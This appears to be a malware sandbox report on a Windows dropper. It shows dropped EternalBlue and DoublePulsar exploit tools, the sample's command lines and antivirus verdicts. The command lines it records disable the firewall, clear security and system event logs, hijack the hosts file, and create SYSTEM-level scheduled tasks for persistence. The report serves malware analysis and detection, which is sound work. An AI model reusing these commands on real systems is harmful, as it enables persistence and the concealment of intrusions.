Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 2, 2024, 10:12 a.m. | Sept. 2, 2024, 10:40 a.m. |

Process | PID | Command line |
---|---|---|
sc.exe | 2656 | sc config lanmanserver start= DISABLED 2>nul |
net1.exe | 3032 | C:\Windows\system32\net1 stop lanmanserver /y |
sc.exe | 2700 | sc delete lanmanserver |
net1.exe | 800 | C:\Windows\system32\net1 stop mssecsvc2.0 |
sc.exe | 2816 | sc delete mssecsvc2.0 |
net1.exe | 2216 | C:\Windows\system32\net1 stop mssecsvc2.1 |
sc.exe | 2936 | sc delete mssecsvc2.1 |
net1.exe | 3016 | C:\Windows\system32\net1 stop COMSysCts |
sc.exe | 812 | sc delete COMSysCts |
net1.exe | 2248 | C:\Windows\system32\net1 stop WmiAppSrv |
sc.exe | 2260 | sc delete WmiAppSrv |
net1.exe | 2120 | C:\Windows\system32\net1 stop Bcdefg |
sc.exe | 2592 | sc delete Bcdefg |
net1.exe | 2940 | C:\Windows\system32\net1 stop WSSDPSRVS |
sc.exe | 2932 | sc delete SSDPSRVS |
net1.exe | 940 | C:\Windows\system32\net1 user mm123$ /del |
net1.exe | 2660 | net1 user mm123$ /del |
net1.exe | 2776 | C:\Windows\system32\net1 user mm123$ /del |
net1.exe | 6000 | net1 user mm123$ /del |
net1.exe | 6984 | C:\Windows\system32\net1 user mm123$ /del |
net1.exe | 7044 | net1 user mm123$ /del |
sc.exe | 7116 | sc config Schedule start= auto |
sc.exe | 7108 | sc start Schedule |
schtasks.exe | 4596 | schtasks /delete /tn AutoKMSK /f |
schtasks.exe | 6952 | schtasks /delete /tn "Adobe Flash Player Updaters" /f |
schtasks.exe | 6896 | schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART |
schtasks.exe | 3736 | schtasks /run /tn "AutoKMSK" |
schtasks.exe | 5496 | schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f |
takeown.exe | 6688 | takeown /f C:\Windows\system32\Drivers\etc\hosts /a |
cmd.exe | 6736 | C:\Windows\system32\cmd.exe /S /D /c" echo y" |
cacls.exe | 6772 | cacls C:\Windows\system32\Drivers\etc\hosts /g users:f |
attrib.exe | 6072 | attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts |
attrib.exe | 4544 | attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts |
cmd.exe | 6604 | C:\Windows\system32\cmd.exe /S /D /c" echo y" |
cacls.exe | 6568 | cacls C:\Windows\system32\Drivers\etc\hosts /d everyone |
ipconfig.exe | 6768 | ipconfig /flushdns |
sc.exe | 3068 | sc start PolicyAgent |
sc.exe | 3116 | sc config PolicyAgent start= AUTO |
netsh.exe | 4580 | netsh ipsec static del all |
netsh.exe | 7376 | netsh ipsec static add policy name=Aliyun |
netsh.exe | 3552 | netsh ipsec static add filterlist name=Allowlist |
netsh.exe | 5628 | netsh ipsec static add filterlist name=denylist |
netsh.exe | 6508 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135 |
netsh.exe | 3648 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137 |
netsh.exe | 5336 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138 |
netsh.exe | 5840 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139 |
netsh.exe | 5420 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445 |
netsh.exe | 5788 | netsh ipsec static add filteraction name=Allow action=permit |
netsh.exe | 6140 | netsh ipsec static add filteraction name=deny action=block |
netsh.exe | 5644 | netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny |
netsh.exe | 6260 | netsh ipsec static set policy name=Aliyun assign=y |
wevtutil.exe | 6244 | wevtutil cl "windows powershell" |
wevtutil.exe | 5940 | wevtutil cl "security" |
wevtutil.exe | 6248 | wevtutil cl "system" |
netsh.exe | 2212 | netsh firewall set opmode mode=disable |
wscript.exe | 2576 | "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\tem.vbs" |

Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. | | |

IP Address | Status | Action |
---|---|---|
No hosts contacted. | | |

Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
packer | Armadillo v1.71 |

name | language | sublanguage | filetype | offset | size |
---|---|---|---|---|---|
TEXTINCLUDE | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | C source, ASCII text, with CRLF line terminators | 0x00494c50 | 0x00000151 |
RT_CURSOR | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | data | 0x00495140 | 0x000000b4 |
RT_BITMAP | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | data | 0x00496848 | 0x00000144 |
RT_MENU | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | data | 0x0049b1e8 | 0x00000284 |
RT_DIALOG | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | data | 0x0049c430 | 0x0000018c |
RT_STRING | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | data | 0x0049ce78 | 0x00000024 |
RT_GROUP_CURSOR | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | Lotus unknown worksheet or configuration, revision 0x2 | 0x0049cec4 | 0x00000022 |
RT_GROUP_ICON | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | data | 0x0049cf3c | 0x00000014 |

file | C:\Program Files\Windowsd\Eternalblue-2.2.0.exe |
file | C:\Program Files\Windowsd\etebCore-2.x64.dll |
file | C:\Program Files\Windowsd\posh.dll |
file | C:\Users\test22\AppData\Local\Temp\tem.vbs |
file | C:\Program Files\Windowsd\tibe.dll |
file | C:\Program Files\Windowsd\pcla-0.dll |
file | C:\Program Files\Windowsd\tucl.dll |
file | C:\Program Files\Windowsd\libeay32.dll |
file | C:\Program Files\Windowsd\adfw.dll |
file | C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe |
file | C:\Program Files\Windowsd\etchCore-1.x64.dll |
file | C:\Program Files\Windowsd\ucl.dll |
file | C:\Program Files\Windowsd\xdvl-0.dll |
file | C:\Program Files\Windowsd\trch.dll |
file | C:\Windows\Installer\Fileftps.exe |
file | C:\Windows\Installer\free.bat |
file | C:\Program Files\Windowsd\pcrecpp-0.dll |
file | C:\Program Files\Windowsd\etchCore-0.x86.dll |
file | C:\Program Files\Windowsd\exma.dll |
file | C:\Program Files\Windowsd\libiconv-2.dll |
file | C:\Program Files\Windowsd\Esteemaudittouch-2.1.0.exe |
file | C:\Program Files\Windowsd\coli-0.dll |
file | C:\Program Files\Windowsd\iconv.dll |
file | C:\Program Files\Windowsd\trfo.dll |
file | C:\Program Files\Windowsd\cnli-1.dll |
file | C:\Program Files\Windowsd\trch-0.dll |
file | C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe |
file | C:\Program Files\Windowsd\Eternalromance-1.3.0.exe |
file | C:\Program Files\Windowsd\riar.dll |
file | C:\Program Files\Windowsd\adfw-2.dll |
file | C:\Program Files\Windowsd\dmgd-4.dll |
file | C:\Program Files\Windowsd\etebCore-2.x86.dll |
file | C:\Program Files\Windowsd\etch-0.dll |
file | C:\Program Files\Windowsd\trch-1.dll |
file | C:\Program Files\Windowsd\tibe-2.dll |
file | C:\Program Files\Windowsd\tucl-1.dll |
file | C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe |
file | C:\Program Files\Windowsd\tibe-1.dll |
file | C:\Program Files\Windowsd\riar-2.dll |
file | C:\Program Files\Windowsd\crli-0.dll |
file | C:\Program Files\Windowsd\etchCore-1.x86.dll |
file | C:\Program Files\Windowsd\dmgd-1.dll |
file | C:\Program Files\Windowsd\exma-1.dll |
file | C:\Program Files\Windowsd\Pkill.dll |
file | C:\Program Files\Windowsd\etchCore-0.x64.dll |
file | C:\Program Files\Windowsd\Eternalromance-1.4.0.exe |
file | C:\Program Files\Windowsd\zlib1.dll |
file | C:\Program Files\Windowsd\ssleay32.dll |
file | C:\Program Files\Windowsd\cnli-0.dll |
file | C:\Program Files\Windowsd\trfo-0.dll |
cmdline | schtasks /delete /tn "Adobe Flash Player Updaters" /f |
cmdline | schtasks /delete /tn AutoKMSK /f |
cmdline | schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART |
cmdline | schtasks /run /tn "AutoKMSK" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo y" |
cmdline | schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f |
cmdline | wevtutil cl "windows powershell" |
file | C:\Users\test22\AppData\Local\Temp\tem.vbs |
file | C:\Windows\Installer\Fileftps.exe |
file | C:\Program Files\Windowsd\Fileftp.exe |
file | C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe |
file | C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe |
file | C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe |
file | C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe |
file | C:\Users\test22\AppData\Local\Temp\c64.exe |
section | .rdata | virtual_address | 0x00094000 | virtual_size | 0x003c43c4 | size_of_data | 0x003c5000 | entropy | 7.96904589584701 | description | A section with a high entropy has been found |
entropy | 0.842059336824 | description | Overall entropy of this PE file is high |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445 |
cmdline | net user mm123$ /del |
cmdline | sc config Schedule start= auto |
cmdline | attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts |
cmdline | net stop lanmanserver /y |
cmdline | net stop mssecsvc2.0 |
cmdline | net stop mssecsvc2.1 |
cmdline | sc delete lanmanserver |
cmdline | sc delete mssecsvc2.1 |
cmdline | sc delete mssecsvc2.0 |
cmdline | schtasks /delete /tn "Adobe Flash Player Updaters" /f |
cmdline | sc delete SSDPSRVS |
cmdline | schtasks /delete /tn AutoKMSK /f |
cmdline | netsh ipsec static del all |
cmdline | schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART |
cmdline | ipconfig /flushdns |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138 |
cmdline | net stop Bcdefg |
cmdline | netsh ipsec static add filteraction name=deny action=block |
cmdline | attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts |
cmdline | schtasks /run /tn "AutoKMSK" |
cmdline | netsh firewall set opmode mode=disable |
cmdline | sc start Schedule |
cmdline | sc delete Bcdefg |
cmdline | net stop WSSDPSRVS |
cmdline | schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f |
cmdline | sc config PolicyAgent start= AUTO |
cmdline | sc delete COMSysCts |
cmdline | netsh ipsec static add filterlist name=Allowlist |
cmdline | net stop WmiAppSrv |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137 |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139 |
cmdline | sc delete WmiAppSrv |
cmdline | netsh ipsec static add filteraction name=Allow action=permit |
cmdline | sc start PolicyAgent |
cmdline | net stop COMSysCts |
cmdline | netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny |
cmdline | netsh ipsec static add filterlist name=denylist |
cmdline | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135 |
cmdline | netsh ipsec static set policy name=Aliyun assign=y |
cmdline | sc config lanmanserver start= DISABLED 2>nul |
cmdline | netsh ipsec static add policy name=Aliyun |
file | C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe |
cmdline | schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART |
cmdline | schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f |
file | C:\Users\test22\AppData\Local\Temp\c64.exe |
file | C:\Users\test22\AppData\Local\Temp\tem.vbs |
file | c:\Windows\inf\demo1.bat |
file | C:\Windows\System32\drivers\etc\hosts |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log |
file | C:\Users\test22\AppData\Local\Temp\java_install_reg.log |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\5BY0Y7HX\index-vfl0GyzuL[1].css |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\ajax-loading-small-vfl3Wt7C_[1].gif |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(20200504233731A78).log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000011.log |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\dropbox_logo_text_2015-vfld7_dJ8[1].svg |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\favicon[3].png |
file | C:\Users\test22\AppData\Local\Temp\Microsoft .NET Framework 4.5 KOR Language Pack Setup_20200715_141443571.html |
file | C:\Users\test22\AppData\Local\Temp\dd_dotNetFx45LP_Full_x86_x64ko_decompression_log.txt |
file | C:\Users\test22\AppData\Local\Temp\dd_SetupUtility.txt |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\AdPostInjectAsync[1].nhn |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000001.log |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\favicon[1].png |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\TopNav[1].js |
file | C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00000.log |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\RxZJdnzeo3R5zSexge8UUfY6323mHUZFJMgTvxaG2iE[1].eot |
file | C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000016.log |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\keys_js5[2].htm |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\CURBIYE7\yahoo[1].png |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\desktop.ini |
file | C:\Users\test22\AppData\Local\Temp\tmpaddon-1 |
file | C:\Users\test22\AppData\Local\Temp\~DFB8537D6963ECB123.TMP |
file | C:\Users\test22\AppData\Local\Temp\MSIdfbe6.LOG |
file | C:\Users\test22\AppData\Local\Temp\FXSAPIDebugLogFile.txt |
file | C:\Users\test22\AppData\Local\Temp\{E7573238-1B24-467B-B5A4-0BE967E0BF64}.tmp |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\favicon[4].png |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\keys_js5[2].htm |
file | C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\favicon[2].png |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\ipsec[1].htm |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\gmail[1].jpg |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\mnrstrtr[1].js |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152043A34).log |
file | C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548.log |
file | C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C).log |
file | C:\Users\test22\AppData\Local\Temp\RGI1518.tmp-tmp |
file | C:\Users\test22\AppData\Local\Temp\DMI9EEF.tmp |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SOC-Facebook[1].png |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f[2].txt |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\CURBIYE7\klldr[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\favicon[1].png |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.dat |
cmdline | wevtutil cl "system" |
cmdline | wevtutil cl "security" |
cmdline | cacls C:\Windows\system32\Drivers\etc\hosts /g users:f |
cmdline | wevtutil cl "windows powershell" |
cmdline | cacls C:\Windows\system32\Drivers\etc\hosts /d everyone |
file | C:\Windows\SysWOW64\wscript.exe |
cmdline | schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART |
cmdline | schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f |

Antivirus | Result |
---|---|
Bkav | W32.VrerTmpolT.Trojan |
Lionic | Trojan.Win32.Generic.lpDo |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
Skyhigh | BehavesLike.Win32.Generic.rc |
ALYac | Gen:Variant.Application.Graftor.485457 |
Cylance | Unsafe |
VIPRE | Gen:Variant.Application.Graftor.485457 |
Sangfor | Dropper.Win32.FlyStudio.Vovj |
K7AntiVirus | Trojan ( 005246d51 ) |
BitDefender | Gen:Variant.Application.Graftor.485457 |
K7GW | Trojan ( 005246d51 ) |
Cybereason | malicious.879361 |
Arcabit | Trojan.Application.Graftor.D76851 |
Symantec | ML.Attribute.HighConfidence |
tehtris | Generic.Malware |
ESET-NOD32 | a variant of Win32/TrojanDropper.FlyStudio.CO |
APEX | Malicious |
McAfee | Artemis!D94524A87936 |
Avast | Win32:Malware-gen |
ClamAV | Win.Malware.Temr-7070541-0 |
Kaspersky | Trojan.Win32.Eb.dlp |
Alibaba | TrojanDropper:Win64/Miancha.fd64af8c |
NANO-Antivirus | Trojan.Win32.Eb.jsmbnw |
MicroWorld-eScan | Gen:Variant.Application.Graftor.485457 |
Emsisoft | Gen:Variant.Application.Graftor.485457 (B) |
F-Secure | Trojan.TR/AD.EquationDrug.qhhxk |
Zillya | Dropper.FlyStudio.Win32.2 |
McAfeeD | Real Protect-LS!D94524A87936 |
Trapmine | malicious.moderate.ml.score |
FireEye | Generic.mg.d94524a8793610d5 |
Sophos | Mal/Generic-S |
SentinelOne | Static AI - Malicious PE |
Webroot | W32.Adware.Gen |
Detected | |
Avira | TR/AD.EquationDrug.qhhxk |
MAX | malware (ai score=71) |
Kingsoft | malware.kb.a.929 |
Xcitium | Worm.Win32.Dropper.RA@1qraug |
Microsoft | Trojan:Win32/DoublePulsar |
ViRobot | Trojan.Win.Z.Flystudio.4698112 |
ZoneAlarm | Trojan.Win32.Eb.dlp |
GData | Win32.Trojan.PSE.17CZDTL |
Varist | W32/S-480dd005!Eldorado |
AhnLab-V3 | Trojan/Win.Eqtonex.C5213267 |
BitDefenderTheta | Gen:NN.ZexaF.36812.@t0@aqMGwNcb |
DeepInstinct | MALICIOUS |
VBA32 | Trojan.Win64.Miner |
Malwarebytes | Generic.Trojan.Malicious.DDS |
Ikarus | Trojan.Win32.Agent |